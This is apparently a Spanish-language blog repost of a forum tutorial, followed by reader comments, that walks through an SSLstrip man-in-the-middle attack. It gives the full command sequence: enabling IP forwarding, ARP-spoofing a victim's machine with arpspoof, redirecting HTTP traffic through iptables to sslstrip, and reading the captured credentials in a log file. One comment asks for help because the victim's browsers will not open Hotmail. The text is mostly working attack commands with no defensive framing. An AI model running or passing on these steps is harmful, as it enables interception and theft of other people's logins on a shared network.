Bueno primero nos descargamos un script en python desde:
http://www.thoughtcrime.org/software/sslstrip/index.html
O la descarga directa:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
Una vez descargado lo extraemos y obtendremos como resultado una carpeta llamada sslstrip-0.6 (la version actual).
A continuación abrimos una shell y ponemos:
echo "1" > /proc/sys/net/ipv4/ip_forward
Ahora realizamos el ataque MITM:
# arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}
A modo de ejemplo:
# arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
Abrimos otra shell y cambiamos la redireccion de puertos usando las iptables:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Una vez echo lo anterior lanzamos el SSLstrip:
# python sslstrip.py -w {nombre_del_archivo_de_captura}
A modo de ejemplo:
# python sslstrip.py -w morsa
Volvemos a abrir otra shell si queremos ver en tiempo real la informacion obtenida
# tail -f {nombre_del_archivo_de_captura}
A modo de ejemplo
# tail -f morsa
Para terminar si posteriormente queremos ver los archivos del fichero de captura hacemos:
nano {nombre_del_archivo_de_captura}
O a modo de ejemplo:
# nano morsa
Autor: Aetsu
Fuente: http://foro.portalhacker.net/
Bien loco me gsuto tu tutorial.....
ResponderEliminarMuyy bueeno! Gracias
ResponderEliminarmuy bien explicado, pero tengo una duda:
ResponderEliminarcuando ejecuto el comando sslstrip, en la pc "victima" los exploradores no me dejan abrir ni hotmail, ni nada que necesite autenticacion...
alguna sugerencia?
gracias